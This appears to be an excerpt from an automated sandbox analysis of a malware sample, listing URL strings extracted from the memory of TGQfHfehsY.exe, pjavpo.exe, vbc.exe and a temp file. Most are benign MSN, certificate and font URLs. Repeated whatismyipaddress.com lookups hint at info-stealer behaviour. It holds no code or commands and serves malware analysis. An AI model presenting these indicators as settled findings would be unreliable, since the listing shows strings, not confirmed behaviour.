                Source: bhv8D09.tmp.13.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AADuG4N?h=75&w=100&m=6&q=60&u=t&o=t&l=f&f=jpg
                Source: bhv8D09.tmp.13.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AADuQtg?h=166&w=310&m=6&q=60&u=t&o=t&l=f&f=jp
                Source: bhv8D09.tmp.13.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AADuTly?h=166&w=310&m=6&q=60&u=t&o=t&l=f&f=jp
                Source: bhv8D09.tmp.13.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AADuTp7?h=333&w=311&m=6&q=60&u=t&o=t&l=f&f=jp
                Source: bhv8D09.tmp.13.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AADuY5J?h=166&w=310&m=6&q=60&u=t&o=t&l=f&f=jp
                Source: bhv8D09.tmp.13.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AADuZko?h=75&w=100&m=6&q=60&u=t&o=t&l=f&f=jpg
                Source: bhv8D09.tmp.13.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AADuqZ9?h=75&w=100&m=6&q=60&u=t&o=t&l=f&f=jpg
                Source: bhv8D09.tmp.13.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AADv4Ge?h=75&w=100&m=6&q=60&u=t&o=t&l=f&f=jpg
                Source: bhv8D09.tmp.13.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AADv842?h=250&w=300&m=6&q=60&u=t&o=t&l=f&f=jp
                Source: bhv8D09.tmp.13.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AADvbPR?h=250&w=300&m=6&q=60&u=t&o=t&l=f&f=jp
                Source: bhv8D09.tmp.13.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AADvbce?h=333&w=311&m=6&q=60&u=t&o=t&l=f&f=jp
                Source: bhv8D09.tmp.13.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AADvhNP?h=333&w=311&m=6&q=60&u=t&o=t&l=f&f=jp
                Source: bhv8D09.tmp.13.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AADvoN9?h=166&w=310&m=6&q=60&u=t&o=t&l=f&f=jp
                Source: bhv8D09.tmp.13.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAyXiwM?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
                Source: bhv8D09.tmp.13.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAyuliQ?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
                Source: bhv8D09.tmp.13.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAzjSw3?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
                Source: bhv8D09.tmp.13.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB16g6qc?h=27&w=27&m=6&q=60&u=t&o=t&l=f&f=png
                Source: bhv8D09.tmp.13.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB17eTok?h=75&w=100&m=6&q=60&u=t&o=t&l=f&f=jp
                Source: bhv8D09.tmp.13.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB18T33l?h=166&w=310&m=6&q=60&u=t&o=t&l=f&f=j
                Source: bhv8D09.tmp.13.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB18qTPD?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
                Source: bhv8D09.tmp.13.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB19x3nX?h=166&w=310&m=6&q=60&u=t&o=t&l=f&f=j
                Source: bhv8D09.tmp.13.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB19xGDT?h=333&w=311&m=6&q=60&u=t&o=t&l=f&f=j
                Source: bhv8D09.tmp.13.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB19xJbM?h=75&w=100&m=6&q=60&u=t&o=t&l=f&f=jp
                Source: bhv8D09.tmp.13.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB19xaUu?h=166&w=310&m=6&q=60&u=t&o=t&l=f&f=j
                Source: bhv8D09.tmp.13.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB19yF6n?h=333&w=311&m=6&q=60&u=t&o=t&l=f&f=j
                Source: bhv8D09.tmp.13.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB19yKf2?h=250&w=300&m=6&q=60&u=t&o=t&l=f&f=j
                Source: bhv8D09.tmp.13.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB19ylKx?h=75&w=100&m=6&q=60&u=t&o=t&l=f&f=jp
                Source: bhv8D09.tmp.13.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB19yuvA?h=250&w=300&m=6&q=60&u=t&o=t&l=f&f=j
                Source: bhv8D09.tmp.13.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB19ywNG?h=75&w=100&m=6&q=60&u=t&o=t&l=f&f=jp
                Source: bhv8D09.tmp.13.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB19yxVU?h=166&w=310&m=6&q=60&u=t&o=t&l=f&f=j
                Source: bhv8D09.tmp.13.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB46JmN?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
                Source: bhv8D09.tmp.13.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB6Ma4a?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
                Source: bhv8D09.tmp.13.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBMVUFn?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
                Source: bhv8D09.tmp.13.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBO5Geh?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
                Source: bhv8D09.tmp.13.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBPfCZL?h=27&w=27&m=6&q=60&u=t&o=t&l=f&f=png
                Source: bhv8D09.tmp.13.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBRUB0d?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
                Source: bhv8D09.tmp.13.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBVuddh?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
                Source: bhv8D09.tmp.13.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBWoHwx?h=27&w=27&m=6&q=60&u=t&o=t&l=f&f=png
                Source: bhv8D09.tmp.13.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBX2afX?h=27&w=27&m=6&q=60&u=t&o=t&l=f&f=png
                Source: bhv8D09.tmp.13.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBi9v6?m=6&o=true&u=true&n=true&w=30&h=30
                Source: bhv8D09.tmp.13.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBih5H?m=6&o=true&u=true&n=true&w=30&h=30
                Source: bhv8D09.tmp.13.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBkwUr?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
                Source: bhv8D09.tmp.13.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBnYSFZ?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
                Source: bhv8D09.tmp.13.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BByBEMv?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
                Source: TGQfHfehsY.exeString found in binary or memory: http://nsis.sf.net/NSIS_Error
                Source: TGQfHfehsY.exeString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
                Source: pjavpo.exe, 00000003.00000002.246555259.00000000020E0000.00000004.00000800.00020000.00000000.sdmp, pjavpo.exe, 00000005.00000002.492406178.0000000000400000.00000040.00000400.00020000.00000000.sdmp, pjavpo.exe, 00000005.00000002.497729162.0000000004A22000.00000040.00000800.00020000.00000000.sdmp, pjavpo.exe, 00000005.00000002.497425736.0000000003801000.00000004.00000800.00020000.00000000.sdmp, pjavpo.exe, 00000005.00000000.244278596.0000000000414000.00000040.00000400.00020000.00000000.sdmp, pjavpo.exe, 00000005.00000002.497655109.0000000004990000.00000004.08000000.00040000.00000000.sdmp, pjavpo.exe, 00000005.00000002.497590428.0000000004908000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0
                Source: bhv8D09.tmp.13.drString found in binary or memory: http://ocsp.digicert.com0
                Source: bhv8D09.tmp.13.drString found in binary or memory: http://ocsp.digicert.com0:
                Source: bhv8D09.tmp.13.drString found in binary or memory: http://ocsp.digicert.com0B
                Source: bhv8D09.tmp.13.drString found in binary or memory: http://ocsp.digicert.com0E
                Source: bhv8D09.tmp.13.drString found in binary or memory: http://ocsp.digicert.com0F
                Source: bhv8D09.tmp.13.drString found in binary or memory: http://ocsp.digicert.com0K
                Source: bhv8D09.tmp.13.drString found in binary or memory: http://ocsp.digicert.com0M
                Source: bhv8D09.tmp.13.drString found in binary or memory: http://ocsp.digicert.com0R
                Source: bhv8D09.tmp.13.drString found in binary or memory: http://ocsp.msocsp.com0
                Source: bhv8D09.tmp.13.drString found in binary or memory: http://ocsp.pki.goog/GTSGIAG30
                Source: bhv8D09.tmp.13.drString found in binary or memory: http://ocsp.pki.goog/gsr202
                Source: bhv8D09.tmp.13.drString found in binary or memory: http://ocsp.pki.goog/gts1o1core0
                Source: bhv8D09.tmp.13.drString found in binary or memory: http://pki.goog/gsr2/GTS1O1.crt0
                Source: bhv8D09.tmp.13.drString found in binary or memory: http://pki.goog/gsr2/GTS1O1.crt0#
                Source: bhv8D09.tmp.13.drString found in binary or memory: http://pki.goog/gsr2/GTS1O1.crt0-
                Source: bhv8D09.tmp.13.drString found in binary or memory: http://pki.goog/gsr2/GTS1O1.crt0M
                Source: bhv8D09.tmp.13.drString found in binary or memory: http://pki.goog/gsr2/GTSGIAG3.crt0)
                Source: bhv8D09.tmp.13.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/_h/2366737e/webcore/externalscripts/oneTrust/ski
                Source: bhv8D09.tmp.13.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/_h/5445db85/webcore/externalscripts/oneTrust/de-
                Source: bhv8D09.tmp.13.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/_h/975a7d20/webcore/externalscripts/jquery/jquer
                Source: bhv8D09.tmp.13.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/de-ch/homepage/_sc/css/3bf20fde-50425371/directi
                Source: bhv8D09.tmp.13.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/de-ch/homepage/_sc/css/f60532dd-3aac3bb8/directi
                Source: bhv8D09.tmp.13.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/de-ch/homepage/_sc/js/3bf20fde-2923b6c2/directio
                Source: bhv8D09.tmp.13.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/de-ch/homepage/_sc/js/3bf20fde-b532f4eb/directio
                Source: bhv8D09.tmp.13.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/de-ch/homepage/_sc/js/f60532dd-2923b6c2/directio
                Source: bhv8D09.tmp.13.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/de-ch/homepage/_sc/js/f60532dd-f8dd99d9/directio
                Source: bhv8D09.tmp.13.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/sc/11/755f86.png
                Source: bhv8D09.tmp.13.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/sc/2b/a5ea21.ico
                Source: bhv8D09.tmp.13.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/sc/64/a8a064.gif
                Source: bhv8D09.tmp.13.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/sc/81/58b810.gif
                Source: bhv8D09.tmp.13.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/sc/86/2042ed.woff
                Source: bhv8D09.tmp.13.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/sc/9b/e151e5.gif
                Source: bhv8D09.tmp.13.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/sc/ea/4996b9.woff
                Source: bhv8D09.tmp.13.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AA61Ofl.img?h=16&w=16&m
                Source: bhv8D09.tmp.13.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AA7XCQ3.img?h=16&w=16&m
                Source: bhv8D09.tmp.13.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AABzUSt.img?h=368&w=622
                Source: bhv8D09.tmp.13.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AADsAOZ.img?h=166&w=310
                Source: bhv8D09.tmp.13.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AADsZuW.img?h=166&w=310
                Source: bhv8D09.tmp.13.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AADuG4N.img?h=75&w=100&
                Source: bhv8D09.tmp.13.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AADuQtg.img?h=166&w=310
                Source: bhv8D09.tmp.13.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AADuTly.img?h=166&w=310
                Source: bhv8D09.tmp.13.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AADuTp7.img?h=333&w=311
                Source: bhv8D09.tmp.13.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AADuY5J.img?h=166&w=310
                Source: bhv8D09.tmp.13.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AADuZko.img?h=75&w=100&
                Source: bhv8D09.tmp.13.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AADuqZ9.img?h=75&w=100&
                Source: bhv8D09.tmp.13.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AADv4Ge.img?h=75&w=100&
                Source: bhv8D09.tmp.13.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AADv842.img?h=250&w=300
                Source: bhv8D09.tmp.13.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AADvbPR.img?h=250&w=300
                Source: bhv8D09.tmp.13.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AADvbce.img?h=333&w=311
                Source: bhv8D09.tmp.13.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AADvhNP.img?h=333&w=311
                Source: bhv8D09.tmp.13.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AADvoN9.img?h=166&w=310
                Source: bhv8D09.tmp.13.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAyXiwM.img?h=16&w=16&m
                Source: bhv8D09.tmp.13.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAyuliQ.img?h=16&w=16&m
                Source: bhv8D09.tmp.13.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAzjSw3.img?h=16&w=16&m
                Source: bhv8D09.tmp.13.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB16g6qc.img?h=27&w=27&
                Source: bhv8D09.tmp.13.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB17eTok.img?h=75&w=100
                Source: bhv8D09.tmp.13.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB18T33l.img?h=166&w=31
                Source: bhv8D09.tmp.13.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB18qTPD.img?h=16&w=16&
                Source: bhv8D09.tmp.13.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB19x3nX.img?h=166&w=31
                Source: bhv8D09.tmp.13.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB19xGDT.img?h=333&w=31
                Source: bhv8D09.tmp.13.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB19xJbM.img?h=75&w=100
                Source: bhv8D09.tmp.13.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB19xaUu.img?h=166&w=31
                Source: bhv8D09.tmp.13.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB19yF6n.img?h=333&w=31
                Source: bhv8D09.tmp.13.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB19yKf2.img?h=250&w=30
                Source: bhv8D09.tmp.13.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB19ylKx.img?h=75&w=100
                Source: bhv8D09.tmp.13.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB19yuvA.img?h=250&w=30
                Source: bhv8D09.tmp.13.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB19ywNG.img?h=75&w=100
                Source: bhv8D09.tmp.13.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB19yxVU.img?h=166&w=31
                Source: bhv8D09.tmp.13.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB46JmN.img?h=16&w=16&m
                Source: bhv8D09.tmp.13.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB6Ma4a.img?h=16&w=16&m
                Source: bhv8D09.tmp.13.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBMVUFn.img?h=16&w=16&m
                Source: bhv8D09.tmp.13.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBO5Geh.img?h=16&w=16&m
                Source: bhv8D09.tmp.13.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBPfCZL.img?h=27&w=27&m
                Source: bhv8D09.tmp.13.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBRUB0d.img?h=16&w=16&m
                Source: bhv8D09.tmp.13.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBVuddh.img?h=16&w=16&m
                Source: bhv8D09.tmp.13.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBWoHwx.img?h=27&w=27&m
                Source: bhv8D09.tmp.13.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBX2afX.img?h=27&w=27&m
                Source: bhv8D09.tmp.13.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBi9v6.img?m=6&o=true&u
                Source: bhv8D09.tmp.13.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBih5H.img?m=6&o=true&u
                Source: bhv8D09.tmp.13.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBkwUr.img?h=16&w=16&m=
                Source: bhv8D09.tmp.13.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBnYSFZ.img?h=16&w=16&m
                Source: bhv8D09.tmp.13.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BByBEMv.img?h=16&w=16&m
                Source: bhv8D09.tmp.13.drString found in binary or memory: http://support.google.com/accounts/answer/151657
                Source: pjavpo.exe, 00000005.00000002.493747770.0000000002801000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://whatismyipaddress.com
                Source: pjavpo.exe, pjavpo.exe, 00000005.00000002.493747770.0000000002801000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://whatismyipaddress.com/
                Source: pjavpo.exe, 00000003.00000002.246555259.00000000020E0000.00000004.00000800.00020000.00000000.sdmp, pjavpo.exe, 00000005.00000002.492406178.0000000000400000.00000040.00000400.00020000.00000000.sdmp, pjavpo.exe, 00000005.00000002.497729162.0000000004A22000.00000040.00000800.00020000.00000000.sdmp, pjavpo.exe, 00000005.00000002.497425736.0000000003801000.00000004.00000800.00020000.00000000.sdmp, pjavpo.exe, 00000005.00000000.244278596.0000000000414000.00000040.00000400.00020000.00000000.sdmp, pjavpo.exe, 00000005.00000002.497655109.0000000004990000.00000004.08000000.00040000.00000000.sdmp, pjavpo.exe, 00000005.00000002.497590428.0000000004908000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://whatismyipaddress.com/-
                Source: pjavpo.exe, 00000005.00000002.499537073.0000000006202000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
                Source: pjavpo.exe, 00000005.00000003.267079423.0000000004F9E000.00000004.00000800.00020000.00000000.sdmp, pjavpo.exe, 00000005.00000003.266811417.0000000004F9E000.00000004.00000800.00020000.00000000.sdmp, pjavpo.exe, 00000005.00000003.267378958.0000000004F9E000.00000004.00000800.00020000.00000000.sdmp, pjavpo.exe, 00000005.00000003.266664691.0000000004F9E000.00000004.00000800.00020000.00000000.sdmp, pjavpo.exe, 00000005.00000003.267513923.0000000004F9E000.00000004.00000800.00020000.00000000.sdmp, pjavpo.exe, 00000005.00000003.266920825.0000000004F9E000.00000004.00000800.00020000.00000000.sdmp, pjavpo.exe, 00000005.00000003.267323200.0000000004F9E000.00000004.00000800.00020000.00000000.sdmp, pjavpo.exe, 00000005.00000003.266505711.0000000004F9E000.00000004.00000800.00020000.00000000.sdmp, pjavpo.exe, 00000005.00000003.267222556.0000000004F9E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.ascendercorp.com/typedesigners.html
                Source: pjavpo.exe, 00000005.00000003.257544389.0000000004F9E000.00000004.00000800.00020000.00000000.sdmp, pjavpo.exe, 00000005.00000003.258100800.0000000004F9E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.carterandcone.com
                Source: pjavpo.exe, 00000005.00000002.499537073.0000000006202000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.carterandcone.coml
                Source: pjavpo.exe, 00000005.00000003.258100800.0000000004F9E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.carterandcone.commg
                Source: pjavpo.exe, 00000005.00000002.499537073.0000000006202000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com
                Source: pjavpo.exe, 00000005.00000002.499537073.0000000006202000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers
                Source: pjavpo.exe, 00000005.00000002.499537073.0000000006202000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
                Source: pjavpo.exe, 00000005.00000002.499537073.0000000006202000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
                Source: pjavpo.exe, 00000005.00000002.499537073.0000000006202000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-user.html
                Source: pjavpo.exe, 00000005.00000002.499537073.0000000006202000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
                Source: pjavpo.exe, 00000005.00000002.499537073.0000000006202000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
                Source: pjavpo.exe, 00000005.00000002.499537073.0000000006202000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
                Source: pjavpo.exe, 00000005.00000002.493470447.0000000000B37000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com91S
                Source: pjavpo.exe, 00000005.00000002.493470447.0000000000B37000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com=
                Source: pjavpo.exe, 00000005.00000002.493470447.0000000000B37000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.comlvfet21Z
                Source: pjavpo.exe, 00000005.00000002.493470447.0000000000B37000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.como
                Source: pjavpo.exe, 00000005.00000002.499537073.0000000006202000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fonts.com
                Source: pjavpo.exe, 00000005.00000003.255679895.0000000004F7C000.00000004.00000800.00020000.00000000.sdmp, pjavpo.exe, 00000005.00000003.254164186.0000000004F9E000.00000004.00000800.00020000.00000000.sdmp, pjavpo.exe, 00000005.00000003.254335364.0000000004FA0000.00000004.00000800.00020000.00000000.sdmp, pjavpo.exe, 00000005.00000002.499537073.0000000006202000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn
                Source: pjavpo.exe, 00000005.00000002.499537073.0000000006202000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
                Source: pjavpo.exe, 00000005.00000002.499537073.0000000006202000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
                Source: pjavpo.exe, 00000005.00000003.255272980.0000000004F9E000.00000004.00000800.00020000.00000000.sdmp, pjavpo.exe, 00000005.00000003.255550167.0000000004F9E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/rL
                Source: pjavpo.exe, 00000005.00000002.499537073.0000000006202000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
                Source: pjavpo.exe, 00000005.00000003.277315069.0000000004F9E000.00000004.00000800.00020000.00000000.sdmp, pjavpo.exe, 00000005.00000002.499537073.0000000006202000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
                Source: pjavpo.exe, 00000005.00000002.499537073.0000000006202000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.goodfont.co.kr
                Source: bhv8D09.tmp.13.drString found in binary or memory: http://www.google.com/
                Source: pjavpo.exe, 00000005.00000002.499537073.0000000006202000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
                Source: bhv8D09.tmp.13.drString found in binary or memory: http://www.msn.com
                Source: bhv8D09.tmp.13.drString found in binary or memory: http://www.msn.com/
                Source: vbc.exe, 0000000D.00000003.327330830.0000000002215000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 0000000D.00000003.323819201.0000000002215000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 0000000D.00000003.326555994.000000000221A000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 0000000D.00000003.324135944.0000000002215000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 0000000D.00000003.323582819.000000000221C000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 0000000D.00000003.324202827.0000000002215000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 0000000D.00000003.323964619.0000000002215000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 0000000D.00000003.325110381.000000000220D000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 0000000D.00000003.324363269.0000000002215000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 0000000D.00000003.325212298.000000000221A000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 0000000D.00000003.326969363.0000000002215000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 0000000D.00000003.327458849.000000000221A000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 0000000D.00000003.326870543.0000000002215000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 0000000D.00000003.324885939.0000000002215000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 0000000D.00000003.324652893.0000000002215000.00000004.00000800.00020000.00000000.sdmp, bhv8D09.tmp.13.drString found in binary or memory: http://www.msn.com/?ocid=iehp
